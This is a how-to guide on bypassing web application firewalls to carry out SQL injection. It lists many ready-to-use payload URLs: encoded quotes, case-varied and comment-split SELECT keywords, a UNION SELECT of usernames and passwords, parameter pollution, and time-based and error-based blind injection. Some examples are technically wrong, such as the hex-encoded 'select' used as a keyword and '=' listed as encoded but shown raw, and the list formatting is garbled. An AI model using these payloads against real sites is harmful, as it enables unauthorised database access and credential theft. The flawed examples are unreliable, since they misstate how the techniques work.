TL;DR
Web Application Firewalls (WAFs) often block common SQL injection attempts. This guide shows techniques to bypass these filters, focusing on encoding, character manipulation, and alternative syntax. Remember ethical hacking principles – only test systems you have permission to access.
Understanding the Problem
A WAF sits between a user and a web server, inspecting incoming requests for malicious patterns (like SQL injection). It’s designed to block these attacks before they reach the database. Bypassing a WAF means finding ways to send SQL code that the WAF doesn’t recognise as harmful.
Solution Guide
- Identify the Filter Rules: Before attempting bypasses, try basic payloads to understand what the WAF blocks. Common blocked keywords include
SELECT,UNION,DROP, and comments (--,/* */). - Character Encoding: WAFs often struggle with different character encodings.
- URL Encoding: Try encoding characters like spaces (%20), single quotes (%27), double quotes (%22) and equals signs (=).
http://example.com/page?id=1%27 - Hex Encoding: Encode parts of your payload in hexadecimal.
http://example.com/page?id=0x41' - Unicode Encoding: Use Unicode representations of characters.
http://example.com/page?id=%u0027
- URL Encoding: Try encoding characters like spaces (%20), single quotes (%27), double quotes (%22) and equals signs (=).
- Case Manipulation: Some WAFs are case-sensitive. Try variations like
SeLeCt,sElEcT, orSELECT.http://example.com/page?id=1 SeLeCt * FROM users - Comment Exploitation: WAFs may not fully understand nested comments.
- Inline Comments: Use multiple inline comments to break up keywords.
http://example.com/page?id=1 /*!SELECT*/ * /*!FROM*/ users - Nested Comments: Try nesting comments.
http://example.com/page?id=1/* comment */SELECT/* comment */* FROM users
- Inline Comments: Use multiple inline comments to break up keywords.
- Whitespace Variations: WAFs may not handle extra whitespace correctly.
- Multiple Spaces: Add multiple spaces between keywords and identifiers.
http://example.com/page?id=1 SELECT * FROM users - Tab Characters (%09): Use tab characters instead of spaces.
http://example.com/page?id=1%09SELECT * FROM users
- Multiple Spaces: Add multiple spaces between keywords and identifiers.
- Alternative Syntax: Explore different SQL syntax that achieves the same result.
- Using Hexadecimal Representation of Strings:
http://example.com/page?id=1' AND 0x73656c656374 * FROM users WHERE 1=1 - Concatenation: Use string concatenation operators (e.g.,
||in PostgreSQL,+in SQL Server).http://example.com/page?id=1' + ' UNION SELECT username, password FROM users -- '
- Using Hexadecimal Representation of Strings:
- HTTP Parameter Pollution (HPP): Send the same parameter multiple times with different values. The server might process them in an unexpected order.
http://example.com/page?id=1&id=%27 - Time-Based Blind SQL Injection: If direct data extraction is blocked, use time delays to infer information.
http://example.com/page?id=1' AND IF(substring(version(),1,1)='5',sleep(5),0)-- ' - Error-Based SQL Injection: If the database returns errors, craft payloads to reveal information.
http://example.com/page?id=1' AND (SELECT 1 FROM users WHERE username = 'admin')-- ' - Use Burp Suite or OWASP ZAP: These tools can help automate the process of testing different payloads and encoding schemes.
Important Note: WAFs are constantly evolving. Techniques that work today may not work tomorrow. Ethical considerations are paramount – always obtain explicit permission before testing any system for vulnerabilities.